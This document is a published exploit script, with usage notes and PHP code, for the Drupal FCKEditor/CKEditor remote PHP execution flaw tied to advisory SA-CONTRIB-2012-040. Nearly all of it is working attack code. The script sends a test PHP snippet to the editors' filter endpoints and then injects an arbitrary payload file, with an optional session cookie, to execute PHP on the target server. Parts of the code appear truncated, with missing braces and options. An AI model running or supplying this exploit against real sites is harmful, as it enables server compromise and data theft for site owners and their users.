Drupal FCKEditor/CKEditor module remote PHP code execution exploit.
# Exploit Title: Drupal FCKEditor/CKEditor module remote PHP execution
# Date: March 19, 2012
# Author: Patroscon
# Software Link: http://drupal.org/project/ckeditor, http://drupal.org/project/fckeditor
# Version: FCKEditor 6.x-2.2, CKEditor 6.x-1.8, CKEditor 7.x-1.6.
# Tested on: Linux, Windows
# Vendor Advisory: http://drupal.org/node/1482528
# Description
# It is possible to instruct FCKEditor and CKEditor module to pass text trough a chosen filter.
# If the PHP filter module is enabled, users can chose to run this filter on chosen code.
# See http://drupal.org/1482528
* Patroscon has RISEN!
* Exploits SA-CONTRIB-2012-040 (http://drupal.org/node/1482528).
* Required: vulnerable site must also use PHP filter module.
* Required for Drupal 6 exploit: You must have access permission listed in advisory.
* Point to the Drupal root.
* Use php patroscon.php http://example.com/ [cookie] [payloadfile]
* example:
* To check if the site can be exploited: php patroscon.php http://example.com/
* If you need a cookie: php patroscon.php http://example.com/ 'SESSa6a82714802c2c37ba16036f1faf01d4=g6TYq0r2mT8wCTQTKiYl6x2lIdRL1H21Db5CbomcKqU'
* It's possible to provide a filename with PHP exploit code. It will be executed when detection was succesful. When you provide the payload file
* you must also provide a cookie argument. This may be a nonsense cookie.
* example:
* php patroscon.php http://example.com/ 'whatever' ./admin_sid.php
* Exploit code must be wrapped in <?php ?> tags. See admin_sid.php for an example.
if (!isset($argv[1])) {
echo "You must give URL such as http://example.com/";
$site = $argv[1];
$cookie = isset($argv[2]) ? $argv[2] : '';
$payloadfile = isset($argv[3]) ? $argv[3] : '';
$exploits = array(
'fckeditor' => array(
'path' => 'fckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
'ckeditor v6' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
'ckeditor v7' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=aaa&textformat_filters=true&input_format=php_code&text=',
echo "\nWorking on $site";
foreach ($exploits as $editor => $exploit) {
echo "\n - $editor";
$url = $site . '/?q=' . urlencode($exploit['path']);
$result = post($url, $exploit['pre'] . urlencode("<?php echo base64_decode('cGF0cm9zY29uIGhhcyByaXNlbg=='); ?>"), $cookie);
switch ($result['info']['http_code']) {
case 200:
if ($result['content'] == 'patroscon has risen') {
echo "\n - exploitable";
if ($payloadfile) {
echo "\n - injecting payload";
$payload = file_get_contents($payloadfile);
$result = post($url, $exploit['pre'] . urlencode($payload), $cookie);
echo "\n\n********* Payload result [{$result['info']['http_code']}] ******************************************************************";
echo "\n" . $result['content'];
echo "\n********** End payload **************************************************************************";
echo "\n";
else {
echo "\n - unable to execute PHP";
case 404:
echo "\n - not installed";
case 403:
echo "\n - access denied";
echo "\n - an unknown error occured.";
echo "\n";
function post($url, $fields, $cookie) {
$handle = curl_init($url);
if (!$handle) {
curl_setopt_array($handle, array(
CURLOPT_COOKIE => $cookie,
$result = curl_exec($handle);
$info = curl_getinfo($handle);
return array('content' => $result, 'info' => $info);